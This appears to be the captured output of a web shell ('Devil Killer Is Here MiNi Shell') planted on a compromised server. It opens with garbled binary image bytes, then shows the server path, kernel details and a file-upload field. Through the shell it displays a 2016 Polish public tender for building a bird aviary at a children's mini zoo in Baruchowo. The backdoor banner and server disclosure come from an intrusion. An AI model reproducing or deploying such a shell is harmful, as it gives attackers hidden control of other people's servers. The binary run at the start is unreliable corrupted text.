JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160706/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160706/121017-N-2016.html

<p class="kh_header"><b>Baruchowo: Budowa zagrody edukacyjnej - Mini ZOO dla dzieci i młodzieży odwiedzającej Zieloną Szkołę w Goreniu Dużym - Budowa ptaszarni z wolierami.</b><br>
<b>Numer ogłoszenia: 121017 - 2016; data zamieszczenia: 06.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Kultury, Sportu i Rekreacji w Baruchowie , Baruchowo 19 B, 87-821 Baruchowo, woj. kujawsko-pomorskie, tel. 54 2845 542, faks 54 2845 848.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.goksirbaruchowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa zagrody edukacyjnej - Mini ZOO dla dzieci i młodzieży odwiedzającej Zieloną Szkołę w Goreniu Dużym - Budowa ptaszarni z wolierami..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem postępowania są roboty budowlane związane z Budową zagrody edukacyjnej - Mini Zoo dla dzieci i młodzieży odwiedzającej Zieloną Szkołę w Goreniu Dużym - Budowa ptaszarni z wolierami. 
Projektowany budynek  jest obiektem wolnostojącym bez poddasza, niepodpiwniczonym, przykrytym dachem dwuspadowym, zrealizowanym w technologii szkieletu drewnianego. Ściany zewnętrzne i wewnętrzne stawiane na budowie w konstrukcji szkieletowej z elementów drewnianych prefabrykowanych. Posadzki na gruncie betonowe. Nadproża drewniane. Pokrycie dachu - blachodachówka. Przy budynku woliery na konstrukcji stalowej. Siatka woliery do wys 200 cm-stalowa. Siatka powyżej 200 cm z tworzywa odpornego na działanie UV. POWIERZCHNIA - razem 49,4 m2. Woliery o powierzchni 18,0 m2 przy każdym boksie. Łącznie woliery 90,0 m2
Zadanie nr 1 - Roboty prowadzące do stanu surowego zamkniętego - termin wykonania do dnia 15.10.2016r.:
PODSTAWOWE DANE TECHNOLOGICZNE
1. BUDYNEK PTASZARNI: Budynek z wolierami jest projektowany dla ptaków ciepłolubnych. W obiekcie nie przewiduje się stałego zatrudnienia. Zapewniono właściwe doświetlenie pomieszczeń . Teren inwestycji w przeważającej części stanowi zieleń niska.
2. TECHNOLOGIA WYKONAWSTWA PROJEKTOWANEGO BUDYNKU. Fundament - ławy wylewane zbrojone. Metoda wykonawstwa tradycyjna, z zastosowaniem ścian fundamentowych murowanych z bloczków betonowych na zaprawie cem.-wap. ocieplonych styropianem gr. 10 cm od strony zewnętrznej murów. Ściany - metoda wykonawstwa szkieletowa. Konstrukcję stanowi szkielet drewniany na profilach drewnianych 145x 45 mm, ocieplony wełną mineralną, obity obustronnie płytą OSB gr 12 mm. Osłonę elewacji stanowi deska drewniana impregnowana. Dach o konstrukcji drewnianej kryty blachądachówką.
3. FUNDAMENTY I STOPY FUNDAMENTOWE. Fundamenty i stopy fundamentowe - wg. części konstrukcyjnej niniejszego opracowania. Posadzka stanu zerowego w obszarze korytarza zagłębiona 10 cm. Posadzka stanu zerowego w obszarze boksów ptaków zagłębiona 14 cm.
4. ŚCIANY. Ściany fundamentowe murowane z bloczków betonowych gr.24cm (bloczki betonowe z betonu klasy B-25 ) na zaprawie cementowej marki M7 z dodatkiem plastyfikatora, ocieplone styropianem EPZ 100-035 gr. 10cm zabezpieczonym podwójną siatką zatopioną w masie klejowej (zaleca się zabezpieczenie od zewnątrz warstwą folii kubełkowej). Ściany konstrukcyjne nad ziemią szkieletowe drewniane z elementów prefabrykowanych gr.18,0 cm . Ściany od zewnątrz osłonięte deską drewnianą. Posadzka w korytarzu komunikacyjnym gresowa z cokołem 10 cm. W boksach ptasich betonowa opuszczona 4 cm poniżej  korytarza, wysypana drobnym żwirem.
5. WIĘŹBA DACHOWA: Drewniana dwuspadowa o spadku 200 i 120 . Element nośny stanowią dźwigary deskowe prefabrykowane o wym. 60x145 mm . Dźwigary nie są widoczne w pomieszczeniach po wykonaniu ocieplenia i podbicia. Konstrukcję dachową zaprojektowano z drewna: klasy C24, suszonego termicznie do wilgotności 12-16 % w temperaturze 65-110oC, zaimpregnowanego trójfunkcyjnym środkiem FOBOS M-4, zabezpieczającym konstrukcję przed działaniem: grzybów, owadów, ognia. Drewno zabezpieczyć preparatem Fobos M-4 metodą zanurzeniową w zakresie reakcji na ogień klasyfikuje się jako B-s2, d0. Klasyfikacja obowiązuje do zastosowań końcowych zgodnie z warunkami technicznymi , jakim powinny odpowiadać budynki i ich usytuowanie oraz jak dla wyrobu niezapalnego, niekapiącego i nieodpadającego pod wpływem ognia oraz nierozprzestrzeniającego ogień wg Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002r (Dz. U. Nr 75 poz. 690 z późniejszymi zmianami)
a. Pokrycie dachu - blacha dachówko podobna stalowa powlekana w kolorze zgodnym z kolorystyką jak na budynku Zielonej Szkoły.
b. Podbitkę pod okapem zadaszenia obudować deskami boazeryjnymi na ruszcie drewnianym.
6. SŁUPY, WIEŃCE I PODCIĄGI: Wg. części konstrukcyjnej niniejszego opracowania - prefabrykowane drewniane.
7. NADPROŻA: Wg. części konstrukcyjnej niniejszego opracowania - prefabrykowane drewniane.
8. STOLARKA OKIENNA I DRZWIOWA: Stolarka okienna PCV dwuszybowa - systemowa. Drzwi zewnętrzne stalowe pełne ocieplone - zgodnie z zestawieniami stolarki. Od strony woliery w każdym boksie przewidziano po jednym oknie nieotwieranym i dwa okna otwierane na zewnątrz, oszklone szybą podwójną bezpieczną. Przy oknach otwieranych do woliery zamontować dwustronne parapety drewniane szerokości 2 x 30 cm. Przepierzenia wewnętrzne między boksami na słupkach drewnianych obustronnie obudowanych płytami OSB a od strony korytarza w systemie aluminiowej modułowej zabudowy wolier . Drzwi wewnętrzne do boksów ptaków - systemowe otwierane na zewnątrz. Okna PCV - zgodnie z zestawieniami stolarki.
9. IZOLACJE: Izolacja przeciwwilgociowa: 
a) pionowa - np.: Combiflex - poniżej poz. terenu i Aquafin 2K -powyżej poz. Terenu (prod.Schomburg) lub podobnymi z folią kubełkową od ław do poziomu terenu; 
b) pozioma - 2x folia budowlana lub papa na lepiku, pod ścianą fundamentową np. 2x papa asfaltowa na lepiku; 
c) paroizolacja -1 x folia paroizolacyjna. Izolacja termiczna: pod płytą posadzkową podłogi na gruncie - styropian EPS 100-036 gr.10 cm, ściany i stropodach - 14 cm wełna mineralna.
Zadanie nr 2 - Roboty wykończeniowe wraz z budową wolier - termin wykonania do dnia 30.03.2017r.:
PODSTAWOWE DANE TECHNOLOGICZNE
10. WYKOŃCZENIE ZEWNĘTRZNE
a) Tynki i okładziny: ściany cokołu ponad gruntem wykończyć płytką klinkierową /24 x 6 x 1 cm/ zbliżoną wielkością i kolorystyką do cokołu Zielonej Szkoły; ściany - okładzina drewniana gr 2,2 cm z oblistwowaniem otworów drzwiowych i okiennych. Przy cokole obróbka blacharska wpuszczona pod okładzinę drewnianą.
b) Elementy D-2 i D-3 od strony woliery obić dwustronnie płytą OSB gub. 12 mm.
11. OBRÓBKI BLACHARSKIE: Obróbki blacharskie, rynny i rury spustowe należy wykonać z blachy stalowej ocynkowanej, powlekanej w kolorze brązowym.
12. INSTALACJE WEWNĘTRZNE: Instalacje elektryczne:
a) instalacja oświetleniowa, gniazda wtykowe, grzejniki elektryczne wg. części elektrycznej niniejszego opracowania Instalacje sanitarne:
b) instalacja wodociągowa podłączona do przyłącza z zaworem czerpalnym ze złączką do węża oraz baterię nad zlewem. Instalację zabezpieczyć przed przemarzaniem.
13. WOLIERY: Od strony wschodniej do budynku ptaszarni przylegają woliery o szerokości 3.0 m , długości 6,0 m i wysokości 4,55 m. Woliery są przedłużeniem boksów pobytowych i stanowią dla ptaków wolny wybieg. Woliery podzielone są na 5 boksów rozdzielonych między sobą siatką z PCV. Konstrukcja wolier oparta jest na 7 stopach fundamentowych 30 x 30 cm. Górna powierzchnia stopy zagłębiona jest na 30 cm poniżej poziomu terenu. Na stopach fundamentu montować słupy z RK 50 x 50 x4 mm i wys. 485 cm. Do słupów montować dwa rygle dolne, jeden środkowy i jeden górny. Dolne rygle montować na poziomie 5 cm i 40 cm. Do rygli dolnych montować wypełnienie z blachy trapezowej powlekanej niskoprofilowej. W gruncie pomiędzy słupami wstawiać obrzeże chodnikowe stabilizowane w betonie o przekroju 5 x 25 cm. Obrzeże wysunąć 5 cm powyżej gruntu do wys. dolnej krawędzi dolnego rygla. Rygiel środkowy montować na poziomie 200 cm. Rygiel górny na poziomie 455 cm. Na konstrukcję dolną - do wysokości 200 cm nałożyć siatkę stalową ocynkowaną o oczkach 2 x 2 cm. Od poziomu 200 cm do góry i na stropie nałożyć siatkę PCV o oczkach 2 x 2 cm. Od frontu wykonać drzwi wejściowe do woliery z zamknięciem kłódkowym. Dolny moduł frontowy obok drzwi wejściowych wykonać jako demontowalny w celu wstawienia bądź wymiany drewnianego pnia stanowiącego element wyposażenia każdej woliery. W każdej z wolier przewidziano pień drewniany z drzewa liściastego z przyciętymi konarami, wkopany w podłoże na głębokość ok 80 cm. Pień powinien wspierać się o stalową konstrukcję przęsła środkowego. Konstrukcję stalową wolier oczyścić do stopnia St 3 i pomalować 2 + 2 farbą podkładową i nawierzchniową chlorokauczukową. Pomiędzy słupami wykonać krzyżowe stężenie prętowe fi 10mm ze śrubami rzymskimi i odpowiednio je naprężyć. W wolierze nr 5 wykonać oczko wodne - basenik obłożony.
2. Wykonawca udzieli Zamawiającemu gwarancji usunięcia wad i usterek przez okres minimum 60 miesięcy od daty końcowego odbioru robót. W wymienionym terminie Wykonawca zobowiązany jest do bezpłatnego usuwania ujawnionych wad i usterek.
3. Zastosowanie rozwiązań równoważnych: Podane w niniejszej Specyfikacji technicznej, projekcie budowlano - wykonawczym oraz w przedmiarze robót nazwy własne (pochodzenie, producent, itd.) mają jedynie charakter pomocniczy dla określenia podstawowych parametrów i cech zastosowanych materiałów. Zamawiający dopuszcza zastosowanie rozwiązań równoważnych. Produkt równoważny to taki, który ma te same cechy funkcjonalne, co wskazany w dokumentacji konkretny z nazwy lub pochodzenia produkt. Jego jakość nie może być gorsza od jakości określonego w specyfikacji produktu oraz powinien mieć parametry nie gorsze niż wskazany produkt..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających w trybie z wolnej ręki, których wartość nie przekroczy 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 44.11.24.00-2, 45.31.12.00-2, 45.33.20.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.03.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 7.000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia nas podstawie Załącznik nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia nas podstawie Załącznik nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia nas podstawie Załącznik nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. Zamawiający uzna warunek za spełniony, jeżeli wykonawcy wykażą dysponowanie przez wykonawcę środkami finansowymi na rachunku bankowym lub zdolnością kredytową w kwocie 500.000,00 zł i posiadanie polisy odpowiedzialności cywilnej na kwotę min. 500.000,00 zł. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wzór zobowiązania do wniesienia zabezpieczenia należytego wykonania przedmiotu umowy; Wzór wykazu robót przeznaczonych do podwykonania; Wzór umowy na roboty budowlane</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmian nie dotyczących treści oferty, na podstawie której dokonano wyboru wykonawcy.
2. Zmian korzystnych dla zamawiającego, których konieczność wprowadzenia wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.
3. Przesunięcia terminu wykonania przedmiotu umowy, jeżeli z przyczyn od wykonawcy niezależnych, których nie można było przewidzieć w chwili zawarcia umowy, nie jest możliwe dotrzymanie terminu wykonania przedmiotu umowy.
4. Przesunięcia terminu wykonania przedmiotu umowy ze względu na konieczność udzielenia zamówień dodatkowych niezbędnych dla prawidłowego wykonania przedmiotu umowy, jeżeli nie jest możliwe równoległe wykonywanie robót.
5. Dopuszczalnej prawem zmiany stron umowy lub oznaczenia stron umowy.
6. Wprowadzenia lub zmiany podwykonawcy lub dalszego podwykonawcy robót.
7. Zmiany wynagrodzenia w następstwie zmiany przepisów o podatku od towarów i usług (VAT).
8. Zmiany w zakresie przedmiotu zamówienia, jeżeli konieczność wprowadzenia takich zmian jest skutkiem zmiany przepisów prawa.
9. Zmian w zakresie zasad rozliczeń i warunków płatności związanych z zawarciem umowy podwykonawstwo lub dalsze podwykonawstwo.
10. Zmiany wynagrodzenia w przypadku ograniczenia przez zamawiającego zakresu przedmiotu umowy z przyczyn, których nie można było przewidzieć w chwili zawarcia umowy.
11. Strona występująca o zmianę postanowień umowy zobowiązana jest do udokumentowania zaistnienia okoliczności, o których mowa w pkt. 1 do 10. Wniosek o zmianę postanowień umowy musi być wyrażony na piśmie.
12. Zmiana umowy może nastąpić wyłącznie w formie pisemnego aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.goksirbaruchowo.pl/bip/przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedzibie Zamawiającego..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.07.2016 godzina 10:00, miejsce: w siedzibie Zamawiającego pokój nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
